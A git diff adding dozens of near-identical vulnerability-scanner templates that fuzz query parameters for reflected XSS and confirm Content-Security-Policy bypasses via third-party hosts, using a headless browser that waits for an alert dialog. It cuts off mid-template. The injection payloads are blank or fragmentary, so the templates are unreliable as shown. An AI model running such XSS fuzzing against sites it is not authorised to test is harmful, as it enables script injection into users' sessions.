diff --git a/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml new file mode 100644 index 00000000000..6e557c29dd5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: 1688-bebezoo-csp-xss + +info: + name: Content-Security-Policy Bypass via 1688 Bebezoo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,1688 + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bebezoo_1688_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bebezoo_1688_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml new file mode 100644 index 00000000000..dad3a24bbc3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: aliexpress-acs-csp-xss + +info: + name: Content-Security-Policy Bypass via AliExpress ACS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,aliexpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: aliexpress_acs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "aliexpress_acs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml new file mode 100644 index 00000000000..e1930202cb4 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml @@ -0,0 +1,55 @@ +id: amazon-aax-eu-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon AAX EU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: amazon_aax_eu_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "amazon_aax_eu_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml new file mode 100644 index 00000000000..840966bbaf9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml @@ -0,0 +1,55 @@ +id: app-link-csp-xss + +info: + name: Content-Security-Policy Bypass via App Link + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,app + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: app_link_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "app_link_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml new file mode 100644 index 00000000000..136e3a1553e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: baidu-map-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Baidu Map API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,baidu + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: baidu_map_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "baidu_map_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml new file mode 100644 index 00000000000..11ea3a00a3b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: bazaarvoice-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Bazaarvoice API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bazaarvoice + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bazaarvoice_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bazaarvoice_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml new file mode 100644 index 00000000000..d0f39f40e0e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml @@ -0,0 +1,55 @@ +id: bdimg-apps-csp-xss + +info: + name: Content-Security-Policy Bypass via BDIMG Apps + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bdimg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bdimg_apps_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bdimg_apps_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml new file mode 100644 index 00000000000..4367e790d4d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: bing-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Bing API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bing + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bing_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bing_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml new file mode 100644 index 00000000000..0fbfa12fe91 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cas-criteo-csp-xss + +info: + name: Content-Security-Policy Bypass via Criteo CAS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,criteo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cas_criteo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cas_criteo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml new file mode 100644 index 00000000000..2ef7e508ab0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdn-arkoselabs-csp-xss + +info: + name: Content-Security-Policy Bypass via Arkose Labs CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,arkoselabs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_arkoselabs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_arkoselabs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml new file mode 100644 index 00000000000..0a1a772742c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdn-jsdelivr-csp-xss + +info: + name: Content-Security-Policy Bypass via jsDelivr CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,jsdelivr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_jsdelivr_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_jsdelivr_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml new file mode 100644 index 00000000000..9633102d173 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdn-shopify-csp-xss + +info: + name: Content-Security-Policy Bypass via Shopify CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,shopify + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_shopify_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_shopify_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml new file mode 100644 index 00000000000..2cb5b931a7a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdn-syncfusion-csp-xss + +info: + name: Content-Security-Policy Bypass via Syncfusion CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,syncfusion + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_syncfusion_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_syncfusion_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml new file mode 100644 index 00000000000..3b41073cfe6 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdnjs-cloudflare-csp-xss + +info: + name: Content-Security-Policy Bypass via Cloudflare CDNJS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudflare + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdnjs_cloudflare_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdnjs_cloudflare_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml new file mode 100644 index 00000000000..dd1d03c6088 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml @@ -0,0 +1,55 @@ +id: challenges-cloudflare-csp-xss + +info: + name: Content-Security-Policy Bypass via Cloudflare Challenges + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudflare + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: challenges_cloudflare_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "challenges_cloudflare_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml new file mode 100644 index 00000000000..f19e169a728 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: chartbeat-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Chartbeat API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,chartbeat + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: chartbeat_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "chartbeat_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml new file mode 100644 index 00000000000..e1321d3dc8e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: client-api-arkoselabs-csp-xss + +info: + name: Content-Security-Policy Bypass via Arkose Labs Client API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,arkoselabs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: client_api_arkoselabs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "client_api_arkoselabs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml new file mode 100644 index 00000000000..cd897434b83 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml @@ -0,0 +1,55 @@ +id: client-crisp-chat-csp-xss + +info: + name: Content-Security-Policy Bypass via Crisp Chat Client + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,crisp + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: client_crisp_chat_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "client_crisp_chat_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml new file mode 100644 index 00000000000..192f40c720a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml @@ -0,0 +1,55 @@ +id: clients1-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Clients1 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: clients1_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "clients1_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml new file mode 100644 index 00000000000..2e869168bd1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: code-angularjs-csp-xss + +info: + name: Content-Security-Policy Bypass via AngularJS CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,angularjs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: code_angularjs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "code_angularjs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml new file mode 100644 index 00000000000..acb17ad55fd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml @@ -0,0 +1,55 @@ +id: commerce-coinbase-csp-xss + +info: + name: Content-Security-Policy Bypass via Coinbase Commerce + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,coinbase + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: commerce_coinbase_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "commerce_coinbase_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml new file mode 100644 index 00000000000..6a3e564d43e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml @@ -0,0 +1,55 @@ +id: common-like-naver-csp-xss + +info: + name: Content-Security-Policy Bypass via Naver Like + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,naver + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: common_like_naver_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "common_like_naver_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml new file mode 100644 index 00000000000..bb9448436bf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml @@ -0,0 +1,55 @@ +id: connect-mail-ru-csp-xss + +info: + name: Content-Security-Policy Bypass via Mail.ru Connect + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mailru + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: connect_mail_ru_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "connect_mail_ru_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml new file mode 100644 index 00000000000..b5c9ce53bc2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml @@ -0,0 +1,55 @@ +id: content-akamai-csp-xss + +info: + name: Content-Security-Policy Bypass via Akamai Content + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,akamai + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: content_akamai_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "content_akamai_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml new file mode 100644 index 00000000000..2b6fe919e85 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cse-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Custom Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cse_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cse_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml new file mode 100644 index 00000000000..6670f774a92 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cxense-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Cxense API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cxense + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: 